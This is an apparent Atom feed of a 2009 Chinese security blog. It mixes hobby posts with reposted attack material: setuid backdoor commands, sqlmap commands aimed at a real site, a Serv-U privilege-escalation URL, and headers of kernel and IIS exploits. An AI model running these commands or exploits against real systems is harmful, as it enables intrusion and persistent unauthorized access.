type='text'>最近發現一家"X範數位科技"所製作的網站系統均有一重大弱點  透過該弱點可以即時拿下該公司所製作的網站,無一悻免  重點是很多政府單位網站(50個?)都是由這家公司所承接設計...  而這些網站正曝高度危機中而沒人知道(會不會有人發現到這個問題?)  就這幾年的研究來看,網站應用程式的弱點真的很多,而且也非常好入門  但似乎每家公司所設計出來的網站應用程式依然都有該類問題?!  是否能想出一些方法來事先防範,維護網站的安全性???  雖然市面上有許多號稱很強的源碼檢測、弱點掃描產品,可是它們被賣很貴  標一個案子來做或許才幾十萬,廠商是否有能力額外購買這些很貴的產品?    (如果一個案子標價能高點就好了..)  而這些產品是否真的能夠證明其價值,而不是打打嘴炮?!    (嘴炮意為:透過跳出許多誤判訊息,來證明該產品很好)     (關鍵字:以量取勝,數大便是美)  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/866558502704994127'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/866558502704994127'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/12/blog-post.html' title='發現重大弱點後的反省'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh3.ggpht.com/_q2SxxmLWIiM/SxYUG7mBvvI/AAAAAAAABHE/59k0n45UUC0/s72-c/6218706et74e2895884fa%26690_thumb%5B2%5D.jpg?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-5171499205969588172</id><published>2009-11-26T15:12:00.001+08:00</published><updated>2009-11-26T15:12:27.839+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='櫻桃小丸子'/><category scheme='http://www.blogger.com/atom/ns#' term='隨身碟大改造'/><category scheme='http://www.blogger.com/atom/ns#' term='麥當勞'/><title type='text'>改造隨身碟III-還是麥當勞小丸子</title><summary type='text'>誰有櫻桃小丸子的帽子,或是知道在那可以買到請跟我說一下   謝謝    </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5171499205969588172'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5171499205969588172'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/11/iii.html' title='改造隨身碟III-還是麥當勞小丸子'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh4.ggpht.com/_q2SxxmLWIiM/Sw4qWtQ34RI/AAAAAAAABG4/joGMOhBjZpI/s72-c/DSC00079_thumb.jpg?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-5060697868035656359</id><published>2009-11-23T14:48:00.001+08:00</published><updated>2009-11-23T14:48:25.565+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='櫻桃小丸子'/><category scheme='http://www.blogger.com/atom/ns#' term='隨身碟大改造'/><category scheme='http://www.blogger.com/atom/ns#' term='麥當勞'/><title type='text'>改造隨身碟II-麥當勞櫻桃小丸子</title><summary type='text'> 還是一樣改造成隨身碟...       </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5060697868035656359'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5060697868035656359'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/11/ii.html' title='改造隨身碟II-麥當勞櫻桃小丸子'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh4.ggpht.com/_q2SxxmLWIiM/SwowNWwsJxI/AAAAAAAABGo/HWBsF0MYPHY/s72-c/DSC00078_thumb.jpg?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-4993519230733080464</id><published>2009-11-16T12:38:00.001+08:00</published><updated>2009-11-16T12:38:08.876+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='小桃'/><category scheme='http://www.blogger.com/atom/ns#' term='7-11'/><title type='text'>7-11 小桃隨身碟</title><summary type='text'>將原本只會搖頭的小桃改裝成一閃一閃的小桃隨身碟  整個就是可愛...    </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4993519230733080464'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4993519230733080464'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/11/7-11.html' title='7-11 小桃隨身碟'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh4.ggpht.com/_q2SxxmLWIiM/SwDXMMcfmrI/AAAAAAAABGg/1Gzh_RiRfLM/s72-c/DSC00077_thumb.jpg?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-5411438490343106692</id><published>2009-11-16T12:16:00.001+08:00</published><updated>2009-11-16T12:16:49.092+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='MSN'/><title type='text'>msnbot</title><summary type='text'>[執行系統指令]      最近因為課業上的需求，需要program a Client&amp;Server  因此就做了個msn的robot，祈求順利過關!!!!  [科技新知:隱科科]     </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5411438490343106692'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5411438490343106692'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/11/msnbot.html' title='msnbot'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh6.ggpht.com/_q2SxxmLWIiM/SwDSK8SqhYI/AAAAAAAABGQ/lqb9SiOp2c0/s72-c/image_thumb.png?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-2191594936968231179</id><published>2009-11-16T12:02:00.001+08:00</published><updated>2009-11-16T12:02:07.224+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='news'/><category scheme='http://www.blogger.com/atom/ns#' term='無線網路'/><title type='text'>買賣無線網卡破解軟體 觸法</title><summary type='text'>新聞來源: 中國時報  台北市刑大首度查獲光華商場３Ｃ店家及上游盤商，涉嫌非法販賣俗稱「卡皇」的高功率無線網卡，搭配BT3破解無線網路密碼軟體(c註:Backtrack不僅只有破解無線網路密碼，更包含...破解工具)，以搜尋並盜用他人無線網路上網。嫌犯供稱一個多月來已賣出兩百多套，警方呼籲民眾勿任意購買使用，以免觸法。(c註:我想單純購買並無觸法,因為無犯罪事實,若是以此工具進行非法破解入侵被抓到,那就請保重啦...而業者若辨稱販賣機器而光碟只是附贈做為研究之用,如:換上此機器後發現ssid增多,不過在於362條中的"製作"二字就看法官怎麼認定了..我對法規不熟,只是隨便聊聊而已!) 【廖嘯龍／台北報導】   (  中華民國 刑法     第 三六 章 妨害電腦使用罪  第  358    條    無故輸入他人帳號密碼、破解使用電腦之保護措施或利用電腦系統之漏洞，</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2191594936968231179'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2191594936968231179'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/11/blog-post.html' title='買賣無線網卡破解軟體 觸法'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-4242706500736880077</id><published>2009-09-09T14:23:00.001+08:00</published><updated>2009-09-09T14:23:28.338+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='河蟹'/><title type='text'>河蟹?!</title><summary type='text'>之前在google搜尋"聽奧網站"可以找到"聽奧網站存在漏洞"  現在連個屁都沒有,好在"聽障奧運主網站"這篇還在  河蟹真的很強大  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4242706500736880077'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4242706500736880077'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/09/blog-post_09.html' title='河蟹?!'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-2522956872542262286</id><published>2009-09-06T03:18:00.002+08:00</published><updated>2009-09-06T04:06:20.984+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='2009聽障奧運'/><title type='text'>聽奧網站存在漏洞</title><summary type='text'>2009聽障奧運今晚盛大開幕了,雖有些小插曲,但也平安..然而就這麼結束了嗎?或只是序幕..在一次頗無聊的檢測中發現,2009聽障奧運網站可能存在非常大漏洞因此,前些日子在站上發布了該漏洞的通知,不曉得有沒有人關心?總之,XX馬此套平台漏洞很大,用該套系統均有漏洞,請小心該平台程式碼已使用zend加密,但還是防不了有心人..XD對惡意攻擊行為者來說,能攻陷許多人常使用的網站,是非常興奮的事除了可快速提升知名度外,也可取得許多不為人知的資料或是快速建立zombie army也因此入口網站,GOOGLE,YAHOO,或MICROSOFT常為眼中目標同理,若舉辦國際盛事的網站有問題被植入0day惡意程式那受害的民眾將不計其數,不管是單純惡作劇,修改比賽分數罝放國旗,或是放發爐的照片也會造成不小的震憾吧希望大家在瀏覽此類網站時能多多注意自身安全謹此</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2522956872542262286'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2522956872542262286'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/09/blog-post.html' title='聽奧網站存在漏洞'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-4941461303598872789</id><published>2009-09-04T14:51:00.001+08:00</published><updated>2009-09-04T14:51:45.260+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='gmail'/><category scheme='http://www.blogger.com/atom/ns#' term='ssmtp'/><title type='text'>FourDollars Blog: 利用 ssmtp 透過 Gmail 在文字模式下寄信</title><summary type='text'>      利用 ssmtp 透過 Gmail 在文字模式下寄信    sudo aptitude install ssmtp 然後編輯 /etc/ssmtp/ssmtp.conf 加入    AuthUser=user.name@gmail.com      AuthPass=password      FromLineOverride=YES      mailhub=smtp.gmail.com:587      UseSTARTTLS=YES 之後就可以透過 mailutils 套件中的 mail 指令來寄信    $ echo "This is a test mail." | mail -s "test mail" user.name@gmail.com 當在你/妳收到自己寄出來的信就可以確認是正常運作的  FourDollars Blog: 利用 ssmtp 透過 Gmail</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4941461303598872789'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4941461303598872789'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/09/fourdollars-blog-ssmtp-gmail.html' title='FourDollars Blog: 利用 ssmtp 透過 Gmail 在文字模式下寄信'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-7189375777642794651</id><published>2009-09-02T10:40:00.001+08:00</published><updated>2009-09-02T10:40:20.918+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='技術文件'/><category scheme='http://www.blogger.com/atom/ns#' term='backdoor'/><title type='text'>*nux如何創建後門</title><summary type='text'>   Submitted by admin on 2009, August 20, 8:59 AM. 網站安全  來源:http://www.key0.cn/post/34.html  千辛萬苦（or 輕而易舉）的取得root後，當然希望長久的保持. 以被以後用來。。。d0ing what u want t0 d0 :) 傳統的方法就是建立一個後門(backd00r).即使入侵被發現，好 的（先進）後門仍然能夠使你再次輕鬆的破門而入 -- 請記住： " we come back and we are the h.a.c.k.e.r "    --     創建後門的方法如下：    -     1. setuid     #cp /bin/sh /tmp/.backdoor     #chmod u+s /tmp/.backdoor     加上 suid 位到shell 上，</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7189375777642794651'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7189375777642794651'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/09/nux.html' title='*nux如何創建後門'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-2684102674666982135</id><published>2009-09-02T10:33:00.001+08:00</published><updated>2009-09-02T10:33:24.098+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='serv-u'/><title type='text'>Serv-U FTP Server v8 本地提權</title><summary type='text'>作者：空虛浪子心  發佈日期：2009-08-05    更新日期：2009-08-05  受影響系統：    serv-u8  不受影響系統：    其他版本不受影響  描述：    看cnbeta發現su出8這個版本了。    想想以前寫過一個7的本地提權。    不知道8有什麼安全方面的更改。    下載來研究下，發現居然還是可以提權的，只是su7的那個不能直接用，稍微修改了下執行的流程。  Su8的管理平臺是http的，繼承了su7的方式。   抓包，分析，發現了以下路程是可以利用的。    1， 管理員從管理主控台打開web頁面時，是不需要驗證密碼的。    2， 管理員如果用某URL打開web頁面時，雖然需要輸入密碼，但是無論輸入什麼，都可以進入。“/?Session=39893&amp;Language=zh,CN&amp;LocalAdmin=1”    3， 管理員可以添加用戶有兩種，</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2684102674666982135'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2684102674666982135'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/09/serv-u-ftp-server-v8.html' title='Serv-U FTP Server v8 本地提權'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-2523660916396321067</id><published>2009-09-02T10:30:00.001+08:00</published><updated>2009-09-02T10:30:46.498+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQL Injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqlmap'/><title type='text'>sqlmap簡單中文說明</title><summary type='text'>mickey整理    來源：影子  更新   svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev  sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&amp;m=1" -v 1 --sql-shell //執行SQL語句  sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&amp;m=1" -v 5 //更詳細的資訊  load options from a configuration INI file   sqlmap -c sqlmap.conf  使用POST方法提交   sqlmap.py -u "http://192.168.1.121/</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2523660916396321067'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2523660916396321067'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/09/sqlmap.html' title='sqlmap簡單中文說明'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-7069224418584639974</id><published>2009-09-02T10:23:00.001+08:00</published><updated>2009-09-02T10:23:34.107+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ssl'/><category scheme='http://www.blogger.com/atom/ns#' term='nc'/><title type='text'>LZX改的NC，支持SSL</title><summary type='text'>作者：LZX  放出來時我改了下程式，加了句Welcome To http://t00ls.net    這個程式用了openssl，不喜歡跟隨兩個dll，所以openssl靜態編譯進去，所以比較大，最終好幾百K    所以這個nc可以作為ssl的用戶端，    比如gmail的安全性要求較高，smtp開始的對話是明文的，但在驗證身份時就一定要切換到ssl協議，    下面演示了用這個程式登陸gmail的smtp，手工通過原始協議發送郵件給小騰，  C:\&gt;zxnc   ZXNC v1.3 by LZX, Welcome To http://t00ls.net  Usage: ZXNC [-l -f -u -ssl] -save &lt;file&gt; -h &lt;IP&gt; -p &lt;Port&gt;   Example:    ZXNC -ssl x.x.x.x 443    ZXNC -l -p 80 監聽</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7069224418584639974'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7069224418584639974'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/09/lzxncssl.html' title='LZX改的NC，支持SSL'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-5929728355746284579</id><published>2009-09-02T10:15:00.001+08:00</published><updated>2009-09-02T10:15:44.519+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='csrf'/><category scheme='http://www.blogger.com/atom/ns#' term='XSS'/><category scheme='http://www.blogger.com/atom/ns#' term='Flash'/><title type='text'>Fly_flash 0.1 release</title><summary type='text'>   fly_flash — Jump/XSS/CSRF in Flash  Author: lake2@80sec.com    Site: http://www.80sec.com    Date: 2009-8-26    From: http://www.80sec.com/release/fly_flash.txt    80SEC — know it then hack it !  [ description ]  fly_flash is a tool for penetration in flash  [ usage ]  upload fly_flash.swf and fly_flash.txt to your server in same directory, embed fly_flash.swf in other website, modify the </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5929728355746284579'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5929728355746284579'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/09/flyflash-01-release.html' title='Fly_flash 0.1 release'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-4157134659979584170</id><published>2009-09-02T10:12:00.001+08:00</published><updated>2009-09-02T10:12:41.985+08:00</updated><title type='text'>校內網flash xss worm威脅分析</title><summary type='text'>分析來源：知道安全（http://www.scanw.com/blog/）  威脅本質：    校內網的 JS函數playswf可以動態地創建一個flash player容器（&lt;embed type=”application/x-shockwave-flash”&gt;&lt;/embed&gt;），而創建的flash player容器錯誤地使用了allowScriptAccess屬性，代碼片段如下：  playswf=function(el,_4e,_4f){  ……  el.innerHTML=XN.Template.flash({width:w,height:h,filename:_4e});  ……  };  XN.template.flash=function(o){  return “ &lt;embed src=\”"+o.filename+”\” type=\”application/</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4157134659979584170'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4157134659979584170'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/09/flash-xss-worm.html' title='校內網flash xss worm威脅分析'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh6.ggpht.com/_q2SxxmLWIiM/Sp3UlWSnQkI/AAAAAAAABFo/4-a-BrOpa8Q/s72-c/clip_image001%5B3%5D.jpg?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-3861535087623654744</id><published>2009-09-02T10:08:00.001+08:00</published><updated>2009-09-02T10:08:47.923+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='linux'/><category scheme='http://www.blogger.com/atom/ns#' term='exploit'/><title type='text'>Linux Kernel 2.6 &lt; 2.6.19 (32bit) ip_append_data() ring0 Root Exploit</title><summary type='text'>   /***** 0x82-CVE-2009-2698** Linux kernel 2.6 &lt; 2.6.19 (32bit) ip_append_data() local ring0 root exploit**** Tested White Box 4(2.6.9-5.ELsmp),** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),** Fedora Core 6(2.6.18-1.2798.fc6).**** --** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.** </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3861535087623654744'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3861535087623654744'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/09/linux-kernel-26-2619-32bit-ipappenddata.html' title='Linux Kernel 2.6 &amp;lt; 2.6.19 (32bit) ip_append_data() ring0 Root Exploit'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-8655808098594770189</id><published>2009-09-02T10:06:00.001+08:00</published><updated>2009-09-02T10:06:52.218+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='linux'/><category scheme='http://www.blogger.com/atom/ns#' term='exploit'/><title type='text'>Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit (ppc)</title><summary type='text'>   /* *  Linux sock_sendpage() NULL pointer dereference *  Copyright 2009 Ramon de Carvalho Valle &lt;ramon@risesecurity.org&gt; * *  This program is free software; you can redistribute it and/or modify *  it under the terms of the GNU General Public License as published by *  the Free Software Foundation; either version 2 of the License, or *  (at your option) any later version. * *  This program is </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8655808098594770189'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8655808098594770189'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/09/linux-kernel-2426-socksendpage-local.html' title='Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit (ppc)'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-8554858943707345849</id><published>2009-09-02T10:05:00.001+08:00</published><updated>2009-09-02T10:05:46.704+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='linux'/><category scheme='http://www.blogger.com/atom/ns#' term='exploit'/><title type='text'>Linux Kernel 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)</title><summary type='text'>      /***** 0x82-CVE-2009-2692** Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)** Tested RedHat Linux 9.0, Fedora core 4~11, Whitebox 4, CentOS 4.x.**** --** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.** spender and venglin's code is very excellent.** Thankful to them.**** Greets: Brad Spengler &lt;spender(at)grsecurity(dot)net&gt;,**</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8554858943707345849'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8554858943707345849'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/09/linux-kernel-2426-socksendpage-ring0.html' title='Linux Kernel 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-448795617342327363</id><published>2009-09-02T10:04:00.001+08:00</published><updated>2009-09-02T10:04:46.658+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IIS'/><category scheme='http://www.blogger.com/atom/ns#' term='0day'/><title type='text'>Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)</title><summary type='text'>      #!/usr/bin/perl# IIS 5.0 FTP Server / Remote SYSTEM exploit # Win2k SP4 targets # bug found &amp; exploited by Kingcope, kcope2&lt;at&gt;googlemail.com # Affects IIS6 with stack cookie protection # Modded by muts, additional egghunter added for secondary larger payload# Might take a minute or two for the egg to be found.# Opens bind shell on port 4444# http://www.offensive-security.com/0day/</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/448795617342327363'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/448795617342327363'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/09/microsoft-iis-50-ftp-server-remote.html' title='Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-1406606842976626304</id><published>2009-08-31T00:58:00.001+08:00</published><updated>2009-08-31T00:58:37.027+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='2009聽障奧運'/><title type='text'>2009聽障奧運主網站存在漏洞</title><summary type='text'>洞還蠻大的,可直接取得權限  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1406606842976626304'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1406606842976626304'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/08/2009.html' title='2009聽障奧運主網站存在漏洞'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' 